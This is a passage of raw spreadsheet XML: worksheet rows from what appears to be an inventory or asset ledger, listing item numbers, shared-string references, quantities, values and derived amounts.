        <v>300.861</v>
      </c>
      <c r="K1087" s="16"/>
    </row>
    <row r="1088" spans="2:11">
      <c r="B1088" s="9">
        <v>1122</v>
      </c>
      <c r="C1088" s="238" t="s">
        <v>7581</v>
      </c>
      <c r="D1088" s="238" t="s">
        <v>7579</v>
      </c>
      <c r="E1088" s="238" t="s">
        <v>7580</v>
      </c>
      <c r="F1088" s="9"/>
      <c r="G1088" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1088" s="10">
        <v>15.7</v>
      </c>
      <c r="I1088" s="14">
        <v>113.73</v>
      </c>
      <c r="J1088" s="15">
        <v>45.4672</v>
      </c>
      <c r="K1088" s="16"/>
    </row>
    <row r="1089" spans="2:11">
      <c r="B1089" s="9">
        <v>1123</v>
      </c>
      <c r="C1089" s="238" t="s">
        <v>7582</v>
      </c>
      <c r="D1089" s="238" t="s">
        <v>4918</v>
      </c>
      <c r="E1089" s="238" t="s">
        <v>7583</v>
      </c>
      <c r="F1089" s="9"/>
      <c r="G1089" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1089" s="10">
        <v>0.85</v>
      </c>
      <c r="I1089" s="14">
        <v>66.67</v>
      </c>
      <c r="J1089" s="15">
        <v>26.6696</v>
      </c>
      <c r="K1089" s="16"/>
    </row>
    <row r="1090" spans="2:11">
      <c r="B1090" s="9">
        <v>1124</v>
      </c>
      <c r="C1090" s="238" t="s">
        <v>7584</v>
      </c>
      <c r="D1090" s="238" t="s">
        <v>7585</v>
      </c>
      <c r="E1090" s="238" t="s">
        <v>7586</v>
      </c>
      <c r="F1090" s="9"/>
      <c r="G1090" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1090" s="10">
        <v>35</v>
      </c>
      <c r="I1090" s="14">
        <v>4487.16</v>
      </c>
      <c r="J1090" s="15">
        <v>1794.8</v>
      </c>
      <c r="K1090" s="16"/>
    </row>
    <row r="1091" spans="2:11">
      <c r="B1091" s="9">
        <v>1125</v>
      </c>
      <c r="C1091" s="238" t="s">
        <v>7587</v>
      </c>
      <c r="D1091" s="238" t="s">
        <v>7588</v>
      </c>
      <c r="E1091" s="238" t="s">
        <v>7589</v>
      </c>
      <c r="F1091" s="9"/>
      <c r="G1091" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1091" s="10">
        <v>1</v>
      </c>
      <c r="I1091" s="14">
        <v>34.27</v>
      </c>
      <c r="J1091" s="15">
        <v>5.4832</v>
      </c>
      <c r="K1091" s="16"/>
    </row>
    <row r="1092" spans="2:11">
      <c r="B1092" s="9">
        <v>1126</v>
      </c>
      <c r="C1092" s="238" t="s">
        <v>7590</v>
      </c>
      <c r="D1092" s="238" t="s">
        <v>7591</v>
      </c>
      <c r="E1092" s="238" t="s">
        <v>7592</v>
      </c>
      <c r="F1092" s="9"/>
      <c r="G1092" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1092" s="10">
        <v>67.6</v>
      </c>
      <c r="I1092" s="14">
        <v>1144.01</v>
      </c>
      <c r="J1092" s="15">
        <v>183.00672</v>
      </c>
      <c r="K1092" s="16"/>
    </row>
    <row r="1093" spans="2:11">
      <c r="B1093" s="9">
        <v>1127</v>
      </c>
      <c r="C1093" s="238" t="s">
        <v>7593</v>
      </c>
      <c r="D1093" s="238" t="s">
        <v>5289</v>
      </c>
      <c r="E1093" s="238" t="s">
        <v>6910</v>
      </c>
      <c r="F1093" s="238" t="s">
        <v>7317</v>
      </c>
      <c r="G1093" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1093" s="10">
        <v>2</v>
      </c>
      <c r="I1093" s="14">
        <v>48</v>
      </c>
      <c r="J1093" s="15">
        <v>7.68</v>
      </c>
      <c r="K1093" s="16"/>
    </row>
    <row r="1094" spans="2:11">
      <c r="B1094" s="9">
        <v>1128</v>
      </c>
      <c r="C1094" s="238" t="s">
        <v>7594</v>
      </c>
      <c r="D1094" s="238" t="s">
        <v>7595</v>
      </c>
      <c r="E1094" s="238" t="s">
        <v>7596</v>
      </c>
      <c r="F1094" s="9"/>
      <c r="G1094" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1094" s="10">
        <v>3</v>
      </c>
      <c r="I1094" s="14">
        <v>25.18</v>
      </c>
      <c r="J1094" s="15">
        <v>4.0272</v>
      </c>
      <c r="K1094" s="16"/>
    </row>
    <row r="1095" spans="2:11">
      <c r="B1095" s="9">
        <v>1129</v>
      </c>
      <c r="C1095" s="238" t="s">
        <v>7597</v>
      </c>
      <c r="D1095" s="238" t="s">
        <v>7598</v>
      </c>
      <c r="E1095" s="238" t="s">
        <v>7599</v>
      </c>
      <c r="F1095" s="9"/>
      <c r="G1095" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H1095" s="10">
        <v>31</v>
      </c>
      <c r="I1095" s="14">
        <v>424.17</v>
      </c>
      <c r="J1095" s="15">
        <v>0</v>
      </c>
      <c r="K1095" s="17" t="s">
        <v>2533</v>
      </c>
    </row>
    <row r="1096" spans="2:11">
      <c r="B1096" s="9">
        <v>1130</v>
      </c>
      <c r="C1096" s="238" t="s">
        <v>7600</v>
      </c>
      <c r="D1096" s="238" t="s">
        <v>7601</v>
      </c>
      <c r="E1096" s="238" t="s">
        <v>7602</v>
      </c>
      <c r="F1096" s="9"/>
      <c r="G1096" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H1096" s="10">
        <v>2</v>
      </c>
      <c r="I1096" s="14">
        <v>166.19</v>
      </c>
      <c r="J1096" s="15">
        <v>26.592</v>
      </c>
      <c r="K1096" s="17"/>
    </row>
    <row r="1097" spans="2:11">
      <c r="B1097" s="9">
        <v>1131</v>
      </c>
      <c r="C1097" s="238" t="s">
        <v>7603</v>
      </c>
      <c r="D1097" s="238" t="s">
        <v>7604</v>
      </c>
      <c r="E1097" s="238" t="s">
        <v>7605</v>
      </c>
      <c r="F1097" s="9"/>
      <c r="G1097" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1097" s="10">
        <v>800</v>
      </c>
      <c r="I1097" s="14">
        <v>1200</v>
      </c>
      <c r="J1097" s="15">
        <v>192</v>
      </c>
      <c r="K1097" s="17"/>
    </row>
    <row r="1098" spans="2:11">
      <c r="B1098" s="9">
        <v>1132</v>
      </c>
      <c r="C1098" s="238" t="s">
        <v>7606</v>
      </c>
      <c r="D1098" s="238" t="s">
        <v>7607</v>
      </c>
      <c r="E1098" s="238" t="s">
        <v>7608</v>
      </c>
      <c r="F1098" s="9"/>
      <c r="G1098" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1098" s="10">
        <v>73.6</v>
      </c>
      <c r="I1098" s="14">
        <v>547.92</v>
      </c>
      <c r="J1098" s="15">
        <v>0</v>
      </c>
      <c r="K1098" s="17" t="s">
        <v>2533</v>
      </c>
    </row>
    <row r="1099" spans="2:11">
      <c r="B1099" s="9">
        <v>1133</v>
      </c>
      <c r="C1099" s="238" t="s">
        <v>7609</v>
      </c>
      <c r="D1099" s="238" t="s">
        <v>7610</v>
      </c>
      <c r="E1099" s="238" t="s">
        <v>7611</v>
      </c>
      <c r="F1099" s="9"/>
      <c r="G1099" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1099" s="10">
        <v>35.8</v>
      </c>
      <c r="I1099" s="14">
        <v>106.88</v>
      </c>
      <c r="J1099" s="15">
        <v>0</v>
      </c>
      <c r="K1099" s="17" t="s">
        <v>2533</v>
      </c>
    </row>
    <row r="1100" spans="2:11">
      <c r="B1100" s="9">
        <v>1134</v>
      </c>
      <c r="C1100" s="238" t="s">
        <v>7612</v>
      </c>
      <c r="D1100" s="238" t="s">
        <v>7613</v>
      </c>
      <c r="E1100" s="238" t="s">
        <v>7614</v>
      </c>
      <c r="F1100" s="9"/>
      <c r="G1100" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H1100" s="10">
        <v>1</v>
      </c>
      <c r="I1100" s="14">
        <v>47</v>
      </c>
      <c r="J1100" s="15">
        <v>7.52</v>
      </c>
      <c r="K1100" s="17"/>
    </row>
    <row r="1101" spans="2:11">
      <c r="B1101" s="9">
        <v>1135</v>
      </c>
      <c r="C1101" s="238" t="s">
        <v>7615</v>
      </c>
      <c r="D1101" s="238" t="s">
        <v>7616</v>
      </c>
      <c r="E1101" s="238" t="s">
        <v>7617</v>
      </c>
      <c r="F1101" s="9"/>
      <c r="G1101" s="237" t="s">
        <v>6878</v>
      </c>
      <c r="H1101" s="10">
        <v>0.98</v>
      </c>
      <c r="I1101" s="14">
        <v>303.4</v>
      </c>
      <c r="J1101" s="15">
        <v>0</v>
      </c>
      <c r="K1101" s="17" t="s">
        <v>2533</v>
      </c>
    </row>
    <row r="1102" spans="2:11">
      <c r="B1102" s="9">
        <v>1136</v>
      </c>
      <c r="C1102" s="238" t="s">
        <v>7618</v>
      </c>
      <c r="D1102" s="238" t="s">
        <v>7619</v>
      </c>
      <c r="E1102" s="238" t="s">
        <v>2449</v>
      </c>
      <c r="F1102" s="9"/>
      <c r="G1102" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H1102" s="10">
        <v>2</v>
      </c>
      <c r="I1102" s="14">
        <v>14.72</v>
      </c>
      <c r="J1102" s="15">
        <v>0</v>
      </c>
      <c r="K1102" s="17" t="s">
        <v>2533</v>
      </c>
    </row>
    <row r="1103" spans="2:11">
      <c r="B1103" s="9">
        <v>1137</v>
      </c>
      <c r="C1103" s="238" t="s">
        <v>7620</v>
      </c>
      <c r="D1103" s="238" t="s">
        <v>7621</v>
      </c>
      <c r="E1103" s="238" t="s">
        <v>7622</v>
      </c>
      <c r="F1103" s="9"/>
      <c r="G1103" s="237" t="s">
        <v>6878</v>
      </c>
      <c r="H1103" s="10">
        <v>1.25</v>
      </c>
      <c r="I1103" s="14">
        <v>500</v>
      </c>
      <c r="J1103" s="15">
        <v>0</v>
      </c>
      <c r="K1103" s="17" t="s">
        <v>7623</v>
      </c>
    </row>
    <row r="1104" spans="2:11">
      <c r="B1104" s="9">
        <v>1138</v>
      </c>
      <c r="C1104" s="238" t="s">
        <v>7624</v>
      </c>
      <c r="D1104" s="238" t="s">
        <v>7625</v>
      </c>
      <c r="E1104" s="238" t="s">
        <v>7626</v>
      </c>
      <c r="F1104" s="9"/>
      <c r="G1104" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1104" s="10">
        <v>6</v>
      </c>
      <c r="I1104" s="14">
        <v>502.59</v>
      </c>
      <c r="J1104" s="15">
        <v>80.4192</v>
      </c>
      <c r="K1104" s="17"/>
    </row>
    <row r="1105" spans="2:11">
      <c r="B1105" s="9">
        <v>1139</v>
      </c>
      <c r="C1105" s="238" t="s">
        <v>7627</v>
      </c>
      <c r="D1105" s="238" t="s">
        <v>7628</v>
      </c>
      <c r="E1105" s="238" t="s">
        <v>7629</v>
      </c>
      <c r="F1105" s="9"/>
      <c r="G1105" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1105" s="10">
        <v>6</v>
      </c>
      <c r="I1105" s="14">
        <v>82.05</v>
      </c>
      <c r="J1105" s="15">
        <v>0</v>
      </c>
      <c r="K1105" s="17" t="s">
        <v>2533</v>
      </c>
    </row>
    <row r="1106" spans="2:11">
      <c r="B1106" s="9">
        <v>1140</v>
      </c>
      <c r="C1106" s="238" t="s">
        <v>7630</v>
      </c>
      <c r="D1106" s="9"/>
      <c r="E1106" s="238" t="s">
        <v>7631</v>
      </c>
      <c r="F1106" s="9"/>
      <c r="G1106" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H1106" s="10">
        <v>90</v>
      </c>
      <c r="I1106" s="14">
        <v>530.77</v>
      </c>
      <c r="J1106" s="15">
        <v>84.96</v>
      </c>
      <c r="K1106" s="17"/>
    </row>
    <row r="1107" spans="2:11">
      <c r="B1107" s="9">
        <v>1141</v>
      </c>
      <c r="C1107" s="238" t="s">
        <v>7632</v>
      </c>
      <c r="D1107" s="238" t="s">
        <v>7633</v>
      </c>
      <c r="E1107" s="238" t="s">
        <v>7634</v>
      </c>
      <c r="F1107" s="238" t="s">
        <v>7635</v>
      </c>
      <c r="G1107" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1107" s="10">
        <v>8</v>
      </c>
      <c r="I1107" s="14">
        <v>9230.77</v>
      </c>
      <c r="J1107" s="15">
        <v>1476.928</v>
      </c>
      <c r="K1107" s="16"/>
    </row>
    <row r="1108" spans="2:11">
      <c r="B1108" s="9">
        <v>1142</v>
      </c>
      <c r="C1108" s="238" t="s">
        <v>7636</v>
      </c>
      <c r="D1108" s="238" t="s">
        <v>7637</v>
      </c>
      <c r="E1108" s="238" t="s">
        <v>7638</v>
      </c>
      <c r="F1108" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1108" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1108" s="10">
        <v>7</v>
      </c>
      <c r="I1108" s="14">
        <v>5454.16</v>
      </c>
      <c r="J1108" s="15">
        <v>872.6704</v>
      </c>
      <c r="K1108" s="16"/>
    </row>
    <row r="1109" spans="2:11">
      <c r="B1109" s="9">
        <v>1143</v>
      </c>
      <c r="C1109" s="238" t="s">
        <v>7640</v>
      </c>
      <c r="D1109" s="238" t="s">
        <v>7641</v>
      </c>
      <c r="E1109" s="238" t="s">
        <v>7642</v>
      </c>
      <c r="F1109" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1109" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1109" s="10">
        <v>7</v>
      </c>
      <c r="I1109" s="14">
        <v>4676.35</v>
      </c>
      <c r="J1109" s="15">
        <v>748.216</v>
      </c>
      <c r="K1109" s="16"/>
    </row>
    <row r="1110" spans="2:11">
      <c r="B1110" s="9">
        <v>1144</v>
      </c>
      <c r="C1110" s="238" t="s">
        <v>7643</v>
      </c>
      <c r="D1110" s="238" t="s">
        <v>7641</v>
      </c>
      <c r="E1110" s="238" t="s">
        <v>7644</v>
      </c>
      <c r="F1110" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1110" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1110" s="10">
        <v>22</v>
      </c>
      <c r="I1110" s="14">
        <v>8251.61</v>
      </c>
      <c r="J1110" s="15">
        <v>1320.2464</v>
      </c>
      <c r="K1110" s="16"/>
    </row>
    <row r="1111" spans="2:11">
      <c r="B1111" s="9">
        <v>1145</v>
      </c>
      <c r="C1111" s="238" t="s">
        <v>7645</v>
      </c>
      <c r="D1111" s="238" t="s">
        <v>7646</v>
      </c>
      <c r="E1111" s="238" t="s">
        <v>7647</v>
      </c>
      <c r="F1111" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1111" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1111" s="10">
        <v>6</v>
      </c>
      <c r="I1111" s="14">
        <v>2289.16</v>
      </c>
      <c r="J1111" s="15">
        <v>366.2688</v>
      </c>
      <c r="K1111" s="16"/>
    </row>
    <row r="1112" spans="2:11">
      <c r="B1112" s="9">
        <v>1146</v>
      </c>
      <c r="C1112" s="238" t="s">
        <v>7648</v>
      </c>
      <c r="D1112" s="238" t="s">
        <v>7649</v>
      </c>
      <c r="E1112" s="238" t="s">
        <v>7650</v>
      </c>
      <c r="F1112" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1112" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1112" s="10">
        <v>1</v>
      </c>
      <c r="I1112" s="14">
        <v>82.86</v>
      </c>
      <c r="J1112" s="15">
        <v>13.2576</v>
      </c>
      <c r="K1112" s="16"/>
    </row>
    <row r="1113" spans="2:11">
      <c r="B1113" s="9">
        <v>1147</v>
      </c>
      <c r="C1113" s="238" t="s">
        <v>7651</v>
      </c>
      <c r="D1113" s="238" t="s">
        <v>7637</v>
      </c>
      <c r="E1113" s="238" t="s">
        <v>7652</v>
      </c>
      <c r="F1113" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1113" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1113" s="10">
        <v>5</v>
      </c>
      <c r="I1113" s="14">
        <v>478.02</v>
      </c>
      <c r="J1113" s="15">
        <v>137.664</v>
      </c>
      <c r="K1113" s="16"/>
    </row>
    <row r="1114" spans="2:11">
      <c r="B1114" s="9">
        <v>1148</v>
      </c>
      <c r="C1114" s="238" t="s">
        <v>7653</v>
      </c>
      <c r="D1114" s="238" t="s">
        <v>7641</v>
      </c>
      <c r="E1114" s="238" t="s">
        <v>7654</v>
      </c>
      <c r="F1114" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1114" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1114" s="10">
        <v>10</v>
      </c>
      <c r="I1114" s="14">
        <v>839.63</v>
      </c>
      <c r="J1114" s="15">
        <v>134.336</v>
      </c>
      <c r="K1114" s="16"/>
    </row>
    <row r="1115" spans="2:11">
      <c r="B1115" s="9">
        <v>1149</v>
      </c>
      <c r="C1115" s="238" t="s">
        <v>7655</v>
      </c>
      <c r="D1115" s="238" t="s">
        <v>7641</v>
      </c>
      <c r="E1115" s="238" t="s">
        <v>7656</v>
      </c>
      <c r="F1115" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1115" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1115" s="10">
        <v>17</v>
      </c>
      <c r="I1115" s="14">
        <v>1989.92</v>
      </c>
      <c r="J1115" s="15">
        <v>318.376</v>
      </c>
      <c r="K1115" s="16"/>
    </row>
    <row r="1116" spans="2:11">
      <c r="B1116" s="9">
        <v>1150</v>
      </c>
      <c r="C1116" s="238" t="s">
        <v>7657</v>
      </c>
      <c r="D1116" s="238" t="s">
        <v>7646</v>
      </c>
      <c r="E1116" s="238" t="s">
        <v>7658</v>
      </c>
      <c r="F1116" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1116" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1116" s="10">
        <v>3</v>
      </c>
      <c r="I1116" s="14">
        <v>90.88</v>
      </c>
      <c r="J1116" s="15">
        <v>19.3856</v>
      </c>
      <c r="K1116" s="16"/>
    </row>
    <row r="1117" spans="2:11">
      <c r="B1117" s="9">
        <v>1151</v>
      </c>
      <c r="C1117" s="238" t="s">
        <v>7659</v>
      </c>
      <c r="D1117" s="238" t="s">
        <v>7660</v>
      </c>
      <c r="E1117" s="238" t="s">
        <v>7661</v>
      </c>
      <c r="F1117" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1117" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1117" s="10">
        <v>30</v>
      </c>
      <c r="I1117" s="14">
        <v>3373.4</v>
      </c>
      <c r="J1117" s="15">
        <v>539.76</v>
      </c>
      <c r="K1117" s="16"/>
    </row>
    <row r="1118" spans="2:11">
      <c r="B1118" s="9">
        <v>1152</v>
      </c>
      <c r="C1118" s="238" t="s">
        <v>7662</v>
      </c>
      <c r="D1118" s="238" t="s">
        <v>7663</v>
      </c>
      <c r="E1118" s="238" t="s">
        <v>7664</v>
      </c>
      <c r="F1118" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1118" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1118" s="10">
        <v>31</v>
      </c>
      <c r="I1118" s="14">
        <v>2676.89</v>
      </c>
      <c r="J1118" s="15">
        <v>428.296</v>
      </c>
      <c r="K1118" s="16"/>
    </row>
    <row r="1119" spans="2:11">
      <c r="B1119" s="9">
        <v>1153</v>
      </c>
      <c r="C1119" s="238" t="s">
        <v>7665</v>
      </c>
      <c r="D1119" s="238" t="s">
        <v>7666</v>
      </c>
      <c r="E1119" s="238" t="s">
        <v>7667</v>
      </c>
      <c r="F1119" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1119" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1119" s="10">
        <v>29</v>
      </c>
      <c r="I1119" s="14">
        <v>2904.68</v>
      </c>
      <c r="J1119" s="15">
        <v>464.7424</v>
      </c>
      <c r="K1119" s="16"/>
    </row>
    <row r="1120" spans="2:11">
      <c r="B1120" s="9">
        <v>1154</v>
      </c>
      <c r="C1120" s="238" t="s">
        <v>7668</v>
      </c>
      <c r="D1120" s="238" t="s">
        <v>7666</v>
      </c>
      <c r="E1120" s="238" t="s">
        <v>7669</v>
      </c>
      <c r="F1120" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1120" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1120" s="10">
        <v>20</v>
      </c>
      <c r="I1120" s="14">
        <v>2566.59</v>
      </c>
      <c r="J1120" s="15">
        <v>410.656</v>
      </c>
      <c r="K1120" s="16"/>
    </row>
    <row r="1121" spans="2:11">
      <c r="B1121" s="9">
        <v>1155</v>
      </c>
      <c r="C1121" s="238" t="s">
        <v>7670</v>
      </c>
      <c r="D1121" s="238" t="s">
        <v>7671</v>
      </c>
      <c r="E1121" s="238" t="s">
        <v>7672</v>
      </c>
      <c r="F1121" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1121" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1121" s="10">
        <v>20</v>
      </c>
      <c r="I1121" s="14">
        <v>1297.83</v>
      </c>
      <c r="J1121" s="15">
        <v>207.648</v>
      </c>
      <c r="K1121" s="16"/>
    </row>
    <row r="1122" spans="2:11">
      <c r="B1122" s="9">
        <v>1156</v>
      </c>
      <c r="C1122" s="238" t="s">
        <v>7673</v>
      </c>
      <c r="D1122" s="238" t="s">
        <v>7674</v>
      </c>
      <c r="E1122" s="238" t="s">
        <v>7675</v>
      </c>
      <c r="F1122" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1122" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1122" s="10">
        <v>105</v>
      </c>
      <c r="I1122" s="14">
        <v>470.78</v>
      </c>
      <c r="J1122" s="15">
        <v>75.264</v>
      </c>
      <c r="K1122" s="16"/>
    </row>
    <row r="1123" spans="2:11">
      <c r="B1123" s="9">
        <v>1157</v>
      </c>
      <c r="C1123" s="238" t="s">
        <v>7676</v>
      </c>
      <c r="D1123" s="238" t="s">
        <v>7677</v>
      </c>
      <c r="E1123" s="238" t="s">
        <v>7678</v>
      </c>
      <c r="F1123" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1123" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1123" s="10">
        <v>90</v>
      </c>
      <c r="I1123" s="14">
        <v>504.84</v>
      </c>
      <c r="J1123" s="15">
        <v>80.784</v>
      </c>
      <c r="K1123" s="16"/>
    </row>
    <row r="1124" spans="2:11">
      <c r="B1124" s="9">
        <v>1158</v>
      </c>
      <c r="C1124" s="238" t="s">
        <v>7679</v>
      </c>
      <c r="D1124" s="238" t="s">
        <v>7680</v>
      </c>
      <c r="E1124" s="238" t="s">
        <v>7681</v>
      </c>
      <c r="F1124" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1124" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1124" s="10">
        <v>185</v>
      </c>
      <c r="I1124" s="14">
        <v>422.01</v>
      </c>
      <c r="J1124" s="15">
        <v>67.488</v>
      </c>
      <c r="K1124" s="16"/>
    </row>
    <row r="1125" spans="2:11">
      <c r="B1125" s="9">
        <v>1159</v>
      </c>
      <c r="C1125" s="238" t="s">
        <v>7682</v>
      </c>
      <c r="D1125" s="238" t="s">
        <v>7680</v>
      </c>
      <c r="E1125" s="238" t="s">
        <v>7683</v>
      </c>
      <c r="F1125" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1125" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1125" s="10">
        <v>88</v>
      </c>
      <c r="I1125" s="14">
        <v>176.53</v>
      </c>
      <c r="J1125" s="15">
        <v>28.3008</v>
      </c>
      <c r="K1125" s="16"/>
    </row>
    <row r="1126" spans="2:11">
      <c r="B1126" s="9">
        <v>1160</v>
      </c>
      <c r="C1126" s="238" t="s">
        <v>7684</v>
      </c>
      <c r="D1126" s="238" t="s">
        <v>7685</v>
      </c>
      <c r="E1126" s="238" t="s">
        <v>7686</v>
      </c>
      <c r="F1126" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1126" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1126" s="10">
        <v>23</v>
      </c>
      <c r="I1126" s="14">
        <v>34.35</v>
      </c>
      <c r="J1126" s="15">
        <v>5.4832</v>
      </c>
      <c r="K1126" s="16"/>
    </row>
    <row r="1127" spans="2:11">
      <c r="B1127" s="9">
        <v>1161</v>
      </c>
      <c r="C1127" s="238" t="s">
        <v>7687</v>
      </c>
      <c r="D1127" s="238" t="s">
        <v>7688</v>
      </c>
      <c r="E1127" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F1127" s="238" t="s">
        <v>7689</v>
      </c>
      <c r="G1127" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1127" s="10">
        <v>1</v>
      </c>
      <c r="I1127" s="14">
        <v>5351.77</v>
      </c>
      <c r="J1127" s="15">
        <v>856.2832</v>
      </c>
      <c r="K1127" s="16"/>
    </row>
    <row r="1128" spans="2:11">
      <c r="B1128" s="9">
        <v>1162</v>
      </c>
      <c r="C1128" s="238" t="s">
        <v>7690</v>
      </c>
      <c r="D1128" s="238" t="s">
        <v>7691</v>
      </c>
      <c r="E1128" s="238" t="s">
        <v>7692</v>
      </c>
      <c r="F1128" s="238" t="s">
        <v>7693</v>
      </c>
      <c r="G1128" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1128" s="10">
        <v>1</v>
      </c>
      <c r="I1128" s="14">
        <v>408.24</v>
      </c>
      <c r="J1128" s="15">
        <v>65.3184</v>
      </c>
      <c r="K1128" s="16"/>
    </row>
    <row r="1129" spans="2:11">
      <c r="B1129" s="9">
        <v>1163</v>
      </c>
      <c r="C1129" s="238" t="s">
        <v>7694</v>
      </c>
      <c r="D1129" s="238" t="s">
        <v>7695</v>
      </c>
      <c r="E1129" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F1129" s="238" t="s">
        <v>7697</v>
      </c>
      <c r="G1129" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1129" s="10">
        <v>1</v>
      </c>
      <c r="I1129" s="14">
        <v>317.39</v>
      </c>
      <c r="J1129" s="15">
        <v>50.7824</v>
      </c>
      <c r="K1129" s="16"/>
    </row>
    <row r="1130" spans="2:11">
      <c r="B1130" s="9">
        <v>1164</v>
      </c>
      <c r="C1130" s="238" t="s">
        <v>7698</v>
      </c>
      <c r="D1130" s="238" t="s">
        <v>7699</v>
      </c>
      <c r="E1130" s="238" t="s">
        <v>7700</v>
      </c>
      <c r="F1130" s="238" t="s">
        <v>7701</v>
      </c>
      <c r="G1130" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1130" s="10">
        <v>1</v>
      </c>
      <c r="I1130" s="14">
        <v>446.4</v>
      </c>
      <c r="J1130" s="15">
        <v>71.424</v>
      </c>
      <c r="K1130" s="16"/>
    </row>
    <row r="1131" spans="2:11">
      <c r="B1131" s="9">
        <v>1165</v>
      </c>
      <c r="C1131" s="238" t="s">
        <v>7702</v>
      </c>
      <c r="D1131" s="238" t="s">
        <v>7703</v>
      </c>
      <c r="E1131" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1131" s="238" t="s">
        <v>7704</v>
      </c>
      <c r="G1131" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1131" s="10">
        <v>50</v>
      </c>
      <c r="I1131" s="14">
        <v>1196.58</v>
      </c>
      <c r="J1131" s="15">
        <v>191.44</v>
      </c>
      <c r="K1131" s="16"/>
    </row>
    <row r="1132" spans="2:11">
      <c r="B1132" s="9">
        <v>1166</v>
      </c>
      <c r="C1132" s="238" t="s">
        <v>7705</v>
      </c>
      <c r="D1132" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E1132" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1132" s="238" t="s">
        <v>7707</v>
      </c>
      <c r="G1132" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1132" s="10">
        <v>60</v>
      </c>
      <c r="I1132" s="14">
        <v>1333.38</v>
      </c>
      <c r="J1132" s="15">
        <v>213.312</v>
      </c>
      <c r="K1132" s="16"/>
    </row>
    <row r="1133" spans="2:11">
      <c r="B1133" s="9">
        <v>1167</v>
      </c>
      <c r="C1133" s="238" t="s">
        <v>7708</v>
      </c>
      <c r="D1133" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E1133" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1133" s="238" t="s">
        <v>7709</v>
      </c>
      <c r="G1133" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1133" s="10">
        <v>50</v>
      </c>
      <c r="I1133" s="14">
        <v>940.17</v>
      </c>
      <c r="J1133" s="15">
        <v>150.4</v>
      </c>
      <c r="K1133" s="16"/>
    </row>
    <row r="1134" spans="2:11">
      <c r="B1134" s="9">
        <v>1168</v>
      </c>
      <c r="C1134" s="238" t="s">
        <v>7710</v>
      </c>
      <c r="D1134" s="238" t="s">
        <v>7711</v>
      </c>
      <c r="E1134" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1134" s="238" t="s">
        <v>7712</v>
      </c>
      <c r="G1134" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1134" s="10">
        <v>80</v>
      </c>
      <c r="I1134" s="14">
        <v>1230.92</v>
      </c>
      <c r="J1134" s="15">
        <v>196.992</v>
      </c>
      <c r="K1134" s="16"/>
    </row>
    <row r="1135" spans="2:11">
      <c r="B1135" s="9">
        <v>1169</v>
      </c>
      <c r="C1135" s="238" t="s">
        <v>7713</v>
      </c>
      <c r="D1135" s="238" t="s">
        <v>7706</v>
      </c>
      <c r="E1135" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1135" s="238" t="s">
        <v>7714</v>
      </c>
